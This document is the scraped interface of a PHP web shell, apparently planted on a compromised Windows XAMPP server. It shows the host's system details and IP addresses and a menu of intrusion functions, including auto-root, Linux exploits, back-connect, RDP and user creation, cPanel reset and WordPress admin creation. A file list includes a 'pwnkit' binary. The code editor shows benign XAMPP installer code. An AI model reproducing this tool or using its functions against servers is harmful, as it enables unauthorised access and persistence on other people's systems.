Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 18.221.240.14
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
install /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
.version
41
B
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
awk.exe
136
KB
-rwxrwxrwx
config.awk
380
B
-rw-rw-rw-
folder.ico
3.19
KB
-rw-rw-rw-
install.php
27.06
KB
-rw-rw-rw-
install.sys
115
B
-rw-rw-rw-
php.png
1.32
KB
-rw-rw-rw-
portcheck.bat
195
B
-rwxrwxrwx
portcheck.php
911
B
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
test.php
2.38
KB
-rw-rw-rw-
xampp-icon-uninstall.ico
30.17
KB
-rw-rw-rw-
xampp.ico
30.17
KB
-rw-rw-rw-
xamppbasic.inc
7.35
KB
-rw-rw-rw-
xamppserver.inc
149
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : test.php
<?php /* #### Installer PHP 1.5 #### #### Author: Kay Vogelgesang & Carsten Wiedmann for www.apachefriends.org 2005 #### */ /// Where I stand? /// $curdir = getcwd(); list($partition, $nonpartition) = preg_split ("/:/", $curdir); //Fix by Wiedmann $partwampp = substr(realpath(__FILE__), 0, strrpos(dirname(realpath(__FILE__)), '\\')); $directorwampp = NULL; $awkpart = str_replace("&", "\\\\&", eregi_replace ("\\\\", "\\\\", $partwampp)); //Fix by Wiedmann $awkpartslash = str_replace("&", "\\\\&", ereg_replace ("\\\\", "/", $partwampp)); //Fix by Wiedmann $phpdir = $partwampp; $dir = ereg_replace("\\\\", "/", $partwampp); $ppartition = "$partition:"; /// I need the install.sys + update.sys for more xampp informations $installsys = "install.sys"; $installsysroot = $partwampp."\install\\".$installsys; /// Some addon|update.sys files $perlupdatesys = "perlupdate.sys"; $pythonupdatesys = "pythonupdate.sys"; $serverupdatesys = "serverupdate.sys"; $utilsupdatesys = "utilsupdate.sys"; $javaupdatesys = "javaupdate.sys"; $otherupdatesys = "otherupdate.sys"; /// XAMPP main directrory is ... $substit = "\\\\\\\\xampp"; $substitslash = "/xampp"; /// Globale variables $BS = 0; $CS = 0; $slashi = 1; $bslashi = 1; $awkexe = ".\install\awk.exe"; $awk = ".\install\config.awk"; $awknewdir = "\"".$awkpart."\""; $awkslashdir = "\"".$awkpartslash."\""; if (file_exists("$partwampp\htdocs\\xampp\.version")) { $handle = fopen("$partwampp\htdocs\\xampp\.version","r"); $xamppversion = fgets($handle); fclose($handle); } else { $xamppversion = ""; // include_once "$partwampp\install\.version"; } echo "\r\n ########################################################################\n"; echo " # ApacheFriends XAMPP setup win32 Version #\r\n"; echo " #----------------------------------------------------------------------#\r\n"; echo " # Copyright (c) 2002-2009 Apachefriends $xamppversion #\r\n"; echo " #----------------------------------------------------------------------#\r\n"; echo " # Authors: Kay Vogelgesang <kvo@apachefriends.org> #\r\n"; echo " # Carsten Wiedmann <webmaster@wiedmann-online.de> #\r\n"; echo " ########################################################################\r\n\r\n"; ?>
Close